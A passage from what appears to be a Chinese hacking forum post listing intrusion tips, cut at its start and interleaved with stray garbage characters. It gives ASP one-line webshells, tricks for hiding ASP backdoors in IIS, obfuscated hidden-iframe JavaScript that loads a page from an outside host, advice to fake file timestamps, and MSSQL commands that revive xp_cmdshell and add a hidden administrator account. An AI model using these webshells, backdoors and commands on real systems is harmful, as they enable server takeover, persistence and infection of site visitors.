# G$ V" y( N% k* T0 _c).%><%execute request("go")%><%8 W3 \; B/ M. f8 h5 y! ~
d).<script language=VBScript runat=server>execute request("sb")</Script>
/ b/ O7 u! _4 A6 z9 a/ a: r- le).<%25Execute(request("l"))%25>) P9 g2 b) g1 I% L7 g
f).<%if request("cmd")<>"" then execute request("pass")%>7 x2 h8 t$ S: J+ o: a& f  Z) P" G
  F5 o9 {/ Y4 T# E/ D  \4 g4 H
52、at "12:17" /interactive cmd4 w* `. R/ Z; f- L
执行后可以用AT命令查看新加的任务
  Z/ o+ u; b0 Y用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。6 z% ?  i% T+ l) W3 @$ ~) J

2 _4 b( L" c+ R# u( ~0 w53、隐藏ASP后门的两种方法
! R8 t3 `3 a$ p" {; U, P8 U1、建立非标准目录:mkdir images..\( R) W# {& t  H! i4 U# L0 R
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp$ a: O5 t7 p) I" j$ C- ^
通过web访问ASP木马:http://ip/images../news.asp?action=login
6 i* u6 J; X; @& m* ^$ v如何删除非标准目录:rmdir images..\ /s/ H/ V9 o( w  S# S6 j
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
! q1 @& K1 L+ b5 t; w! ?6 Amkdir programme.asp! }. m; \4 R2 `- ], q7 J
新建1.txt文件内容:<!--#include file=”12.jpg”-->: j8 ?$ s8 X3 b$ I! z# D
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
7 C0 \* x" j, N7 I6 K3 h  jattrib +H +S programme.asp! R0 K0 T% n. F; Z
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt; M/ i: g" ^9 {& ^9 p% j& D
" c) |7 T2 v/ |
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。$ }: O$ p. s! x
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
' d  l: T1 f+ G6 u# {& M; x; J1 w/ e: ^
55、JS隐蔽挂马1 I' I: t, }0 ]- Q
1.
" Y( C4 f3 ]$ y4 \' `5 A2 Gvar tr4c3="<iframe src=ht";
, [. c, ^: v" v7 A$ A' f/ Ltr4c3 = tr4c3+"tp:/";
5 L" p0 [8 @$ V) ^& K( A2 ytr4c3 = tr4c3+"/ww";
% [) s: ~& m: n( Utr4c3 = tr4c3+"w.tr4";
' |- F9 A/ H) A% G6 jtr4c3 = tr4c3+"c3.com/inc/m";
8 r9 T5 W1 L2 }0 C( [1 @: Ytr4c3 = tr4c3+"m.htm style="display:none"></i";
- x; K' q4 t. P4 T9 {) V  F9 Rtr4c3 =tr4c3+"frame>'";$ E. s: h. C, Y. D/ C
document.write(tr4c3);
5 _. {: b9 b) q5 ^* Y; I/ W; j避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。8 J' k( G8 S/ {( o* ^# [3 y) {
: }7 v! H' Y& S4 [, }' ]- {
2.
: B( Q2 E& L6 o4 ?1 ^转换进制,然后用EVAL执行。如
9 x( J" n! H3 a0 Z( x5 Z! n2 ]% ueval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
+ g3 q) b1 M' n9 l  e不过这个有点显眼。4 Y2 s" k9 a% r& Z
3.
  A( K# O$ l0 d- k* P5 x* Jdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
- v, R- \. @, {/ }! {最后一点,别忘了把文件的时间也修改下。/ S4 r4 b3 Z: X  Q' k0 f4 X

6 ?' M1 R% m7 G- T; t7 K56.3389终端入侵常用DOS命令% `9 L( w* C. Z; L
taskkill taskkill /PID 1248 /t0 W/ \" a2 C- s1 X

/ w1 Y5 i7 C7 [9 w$ N( Y# @0 ntasklist 查进程
' }$ G3 s, p+ a7 C% j0 ^5 L. k0 ^4 y1 ^4 T/ D0 s. @, D
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限" L9 n: s4 S' K* G. k- I' b
iisreset /reboot
, A9 d4 x) [" r7 F3 P6 [- {tsshutdn /reboot /delay:1    重起服务器
; w, Y" h. I& _4 G3 q! G+ r: X2 r& ^  I7 t& \$ Z" n% t/ Q$ p
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,  Z2 e  M6 d' [3 [1 L

9 O$ |! W9 s$ zquery user 查看当前终端用户在线情况6 ^' x5 m5 O( l; s. F+ m
$ V2 r6 L$ K9 q+ n) U/ R) Y
要显示有关所有会话使用的进程的信息,请键入:query process *
9 b0 O$ z6 I- |! o+ b5 B) U1 g& d  h: C; t7 j
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2, E& f7 W3 G! a$ G* p4 q

6 P, @! M" z6 L& g  N: A% \' I要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2# R: Z2 O4 w3 p6 |  r

; h) `* U5 }& x- t5 k要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
* \9 u( N) H$ _+ v- K
; r+ v7 Y) |1 }/ G命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
& u# A! D4 U2 E% Q6 S5 E3 [% K, j  b! `- I, c! l" \6 F6 ~9 M
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
: o$ v5 ]" z% a3 E( d1 q5 S. ^7 @
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。6 A& x$ Y. P# M; H) J6 y

6 D6 P' P7 b1 V) p* a命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机, q0 B5 b$ N0 \" z, {' m6 \

9 c; s. l1 W7 I2 K56、在地址栏或按Ctrl+O,输入:
. a/ }: h, B. q1 p9 ]5 y8 Ljavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
! F" W% U* q$ H5 V$ w
, `2 }8 H* c3 z3 t源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。5 y$ S; H8 z$ `( \% n

! \8 V% }! f/ }8 [6 o; a* v2 P57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
% {, O7 z5 N& }( L3 ^& L用net localgroup administrators是可以看到管理组下,加了$的用户的。
& x" y9 i3 g( r( C9 o
, `7 O5 h7 z$ D- C58、 sa弱口令相关命令& V% m  _1 ?  h4 S, p1 M" K

$ G) `! R$ @' T4 Q- Y3 e1 B6 b一.更改sa口令方法:
2 b0 {) H+ \" m9 x7 v# p) }  N用sql综合利用工具连接后,执行命令:
, f1 A. j: P+ t" L% v" Qexec sp_password NULL,'20001001','sa'
. {9 I1 S& n9 K. Q8 h( v+ F% h4 ?) ?(提示:慎用!)5 S4 v. b6 c" Y

5 E. ]1 m9 a5 T- F% C% D; d% [5 F; ]二.简单修补sa弱口令.
* ^7 K/ j+ W3 c9 z+ D
! G( c2 O5 j6 d* `3 ^方法1:查询分离器连接后执行:; B1 ~" X& c4 V' S: E4 t
if exists (select * from
8 q4 g  H7 P1 x& \' U9 m6 Tdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and+ K/ }' ]; L, c; C0 M
OBJECTPROPERTY(id, N'IsExtendedProc') = 1), `/ M7 E1 h3 _' U; w8 y
& u4 f2 v. G3 d4 e
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'- g7 s& c' o1 j# c$ O8 x2 r6 Q
& a/ x; }$ G$ v& B/ n$ D! U+ ~) ?* e
GO0 w0 n4 m$ }7 ~  ~
0 g1 M( d! ]$ e/ ?0 R# p
然后按F5键命令执行完毕" Z* ^( ]1 H" w! E& y
7 t# w! J0 s7 C0 e5 C3 v$ X1 A2 p
方法2:查询分离器连接后
" e# w3 k! n: _% e! g第一步执行:use master
% B0 i  `6 l1 X  T- R第二步执行:sp_dropextendedproc 'xp_cmdshell'
" ^( E! s! O! t3 }$ D: \然后按F5键命令执行完毕
+ _) y" ^& x- o6 L0 u3 D1 p3 ?$ y( u  y) q

( k6 ~2 M0 j$ j; f+ l5 \三.常见情况恢复执行xp_cmdshell.( d  |! V1 ^  Y. Z/ y# i
7 p. I5 m6 L) H' o- V9 ~
& X9 s' A" ]) w0 ]6 R1 t
1 未能找到存储过程'master..xpcmdshell'.
) O" @3 a* B6 y! b+ T: ?   恢复方法:查询分离器连接后,
0 H% I9 h% k- z+ B( \第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
, v* u: \5 r6 z6 i- f第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'6 W  [! g( n  W' J0 g# I1 I
然后按F5键命令执行完毕
  s& Q  o/ H& E. ?" `! L& i; C( e' [
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)) u8 [; P# x$ l/ R6 f/ D
恢复方法:查询分离器连接后,
7 R2 _' i$ s+ @- U第一步执行:sp_dropextendedproc "xp_cmdshell"; V0 ?- C5 t& `6 q/ q
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
0 q6 M9 t! I/ m! Q  Q然后按F5键命令执行完毕/ a4 M1 Q- N$ x* ^0 O9 p

1 P' ~7 ^- D  m6 ^3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)2 c; Y9 |  ]' `% y; h1 q
恢复方法:查询分离器连接后,
& ~3 N$ C1 q- v5 b3 R- ^第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
+ R: i! h3 j8 O( s1 e  H) r第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           ' E) H0 g5 g% l4 n7 r. i
然后按F5键命令执行完毕
) X4 J1 f( N3 W, X  g' Z8 X
& W4 [8 y& ]6 l: F四.终极方法.* r2 B! X, M' t7 T* {
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:2 I# M1 k5 O5 M* W! `
查询分离器连接后,
6 }; g  n8 ^( H+ a1 I+ i( u2000servser系统:1 X: I# O  u# e; U1 V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
& O0 Z7 |0 u, r: {6 B) f9 _2 Y# c8 C6 }( X9 r! Y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'+ ?3 n3 u. y- r8 U& B; v8 ?: d

( t8 h& ^; D% e7 Bxp或2003server系统:
  g7 g9 p# ?5 b7 o* ]; e; G, l  z+ [  |; M9 M5 h2 t8 z
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
2 b/ j* j" K5 r  f2 A- i3 C$ p/ D, `5 a$ ]3 q: ?' [
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
8 g3 N' k+ Z8 N' m+ {; E0 K! |/ E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表